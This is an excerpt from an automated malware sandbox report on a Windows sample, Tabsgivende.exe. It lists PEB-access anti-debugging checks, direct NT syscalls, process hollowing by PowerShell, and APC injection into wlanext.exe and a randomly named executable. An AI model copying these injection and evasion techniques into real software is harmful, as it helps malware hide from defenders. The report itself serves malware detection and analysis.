Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522582 mov ecx, dword ptr fs:[00000030h] 18_2_22522582
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22554588 mov eax, dword ptr fs:[00000030h] 18_2_22554588
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225445B1 mov eax, dword ptr fs:[00000030h] 18_2_225445B1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225445B1 mov eax, dword ptr fs:[00000030h] 18_2_225445B1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h] 18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h] 18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h] 18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530A5B mov eax, dword ptr fs:[00000030h] 18_2_22530A5B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530A5B mov eax, dword ptr fs:[00000030h] 18_2_22530A5B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259CA72 mov eax, dword ptr fs:[00000030h] 18_2_2259CA72
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259CA72 mov eax, dword ptr fs:[00000030h] 18_2_2259CA72
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h] 18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h] 18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h] 18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ACA11 mov eax, dword ptr fs:[00000030h] 18_2_225ACA11
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22544A35 mov eax, dword ptr fs:[00000030h] 18_2_22544A35
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22544A35 mov eax, dword ptr fs:[00000030h] 18_2_22544A35
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA38 mov eax, dword ptr fs:[00000030h] 18_2_2255CA38
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA24 mov eax, dword ptr fs:[00000030h] 18_2_2255CA24
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254EA2E mov eax, dword ptr fs:[00000030h] 18_2_2254EA2E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520AD0 mov eax, dword ptr fs:[00000030h] 18_2_22520AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22554AD0 mov eax, dword ptr fs:[00000030h] 18_2_22554AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22554AD0 mov eax, dword ptr fs:[00000030h] 18_2_22554AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h] 18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h] 18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h] 18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255AAEE mov eax, dword ptr fs:[00000030h] 18_2_2255AAEE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255AAEE mov eax, dword ptr fs:[00000030h] 18_2_2255AAEE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558A90 mov edx, dword ptr fs:[00000030h] 18_2_22558A90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4A80 mov eax, dword ptr fs:[00000030h] 18_2_225F4A80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528AA0 mov eax, dword ptr fs:[00000030h] 18_2_22528AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528AA0 mov eax, dword ptr fs:[00000030h] 18_2_22528AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22576AA4 mov eax, dword ptr fs:[00000030h] 18_2_22576AA4
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6B40 mov eax, dword ptr fs:[00000030h] 18_2_225B6B40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6B40 mov eax, dword ptr fs:[00000030h] 18_2_225B6B40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EAB40 mov eax, dword ptr fs:[00000030h] 18_2_225EAB40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225C8B42 mov eax, dword ptr fs:[00000030h] 18_2_225C8B42
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CB7E mov eax, dword ptr fs:[00000030h] 18_2_2251CB7E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254EB20 mov eax, dword ptr fs:[00000030h] 18_2_2254EB20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E8B28 mov eax, dword ptr fs:[00000030h] 18_2_225E8B28
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CEBD0 mov eax, dword ptr fs:[00000030h] 18_2_225CEBD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22540BCB mov eax, dword ptr fs:[00000030h] 18_2_22540BCB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520BCD mov eax, dword ptr fs:[00000030h] 18_2_22520BCD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528BF0 mov eax, dword ptr fs:[00000030h] 18_2_22528BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254EBFC mov eax, dword ptr fs:[00000030h] 18_2_2254EBFC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ACBF0 mov eax, dword ptr fs:[00000030h] 18_2_225ACBF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530BBE mov eax, dword ptr fs:[00000030h] 18_2_22530BBE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22550854 mov eax, dword ptr fs:[00000030h] 18_2_22550854
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524859 mov eax, dword ptr fs:[00000030h] 18_2_22524859
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22532840 mov ecx, dword ptr fs:[00000030h] 18_2_22532840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE872 mov eax, dword ptr fs:[00000030h] 18_2_225AE872
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6870 mov eax, dword ptr fs:[00000030h] 18_2_225B6870
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC810 mov eax, dword ptr fs:[00000030h] 18_2_225AC810
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h] 18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542835 mov ecx, dword ptr fs:[00000030h] 18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A830 mov eax, dword ptr fs:[00000030h] 18_2_2255A830
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E8C0 mov eax, dword ptr fs:[00000030h] 18_2_2254E8C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C8F9 mov eax, dword ptr fs:[00000030h] 18_2_2255C8F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EA8E4 mov eax, dword ptr fs:[00000030h] 18_2_225EA8E4
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC89D mov eax, dword ptr fs:[00000030h] 18_2_225AC89D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520887 mov eax, dword ptr fs:[00000030h] 18_2_22520887
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0946 mov eax, dword ptr fs:[00000030h] 18_2_225A0946
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC97C mov eax, dword ptr fs:[00000030h] 18_2_225AC97C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22546962 mov eax, dword ptr fs:[00000030h] 18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E mov eax, dword ptr fs:[00000030h] 18_2_2256096E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E mov edx, dword ptr fs:[00000030h] 18_2_2256096E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC912 mov eax, dword ptr fs:[00000030h] 18_2_225AC912
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518918 mov eax, dword ptr fs:[00000030h] 18_2_22518918
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E908 mov eax, dword ptr fs:[00000030h] 18_2_2259E908
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A892A mov eax, dword ptr fs:[00000030h] 18_2_225A892A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B892B mov eax, dword ptr fs:[00000030h] 18_2_225B892B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h] 18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225549D0 mov eax, dword ptr fs:[00000030h] 18_2_225549D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EA9D3 mov eax, dword ptr fs:[00000030h] 18_2_225EA9D3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B69C0 mov eax, dword ptr fs:[00000030h] 18_2_225B69C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225529F9 mov eax, dword ptr fs:[00000030h] 18_2_225529F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE9E0 mov eax, dword ptr fs:[00000030h] 18_2_225AE9E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A89B3 mov esi, dword ptr fs:[00000030h] 18_2_225A89B3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A89B3 mov eax, dword ptr fs:[00000030h] 18_2_225A89B3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225209AD mov eax, dword ptr fs:[00000030h] 18_2_225209AD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F2E4F mov eax, dword ptr fs:[00000030h] 18_2_225F2E4F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526E71 mov eax, dword ptr fs:[00000030h] 18_2_22526E71
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0E7F mov eax, dword ptr fs:[00000030h] 18_2_225A0E7F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518E1D mov eax, dword ptr fs:[00000030h] 18_2_22518E1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AE00 mov ecx, dword ptr fs:[00000030h] 18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6E20 mov eax, dword ptr fs:[00000030h] 18_2_225B6E20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6E20 mov ecx, dword ptr fs:[00000030h] 18_2_225B6E20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558EF5 mov eax, dword ptr fs:[00000030h] 18_2_22558EF5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h] 18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251AE90 mov eax, dword ptr fs:[00000030h] 18_2_2251AE90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22552E9C mov eax, dword ptr fs:[00000030h] 18_2_22552E9C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22552E9C mov ecx, dword ptr fs:[00000030h] 18_2_22552E9C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225BAEB0 mov eax, dword ptr fs:[00000030h] 18_2_225BAEB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ACEA0 mov eax, dword ptr fs:[00000030h] 18_2_225ACEA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h] 18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CF50 mov eax, dword ptr fs:[00000030h] 18_2_2255CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225C0F50 mov eax, dword ptr fs:[00000030h] 18_2_225C0F50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h] 18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4F68 mov eax, dword ptr fs:[00000030h] 18_2_225F4F68
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254AF69 mov eax, dword ptr fs:[00000030h] 18_2_2254AF69
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522F12 mov eax, dword ptr fs:[00000030h] 18_2_22522F12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtMapViewOfSection: Direct from: 0x77762D1C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtProtectVirtualMemory: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtReadFile: Direct from: 0x77762ADC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtWriteVirtualMemory: Direct from: 0x7776490C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtResumeThread: Direct from: 0x77762FBC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtCreateUserProcess: Direct from: 0x7776371C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtSetInformationThread: Direct from: 0x777563F9
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtTerminateProcess: Direct from: 0x77762D5C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe Thread APC queued: target process: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base: 1660000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base: 19FFF4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe"
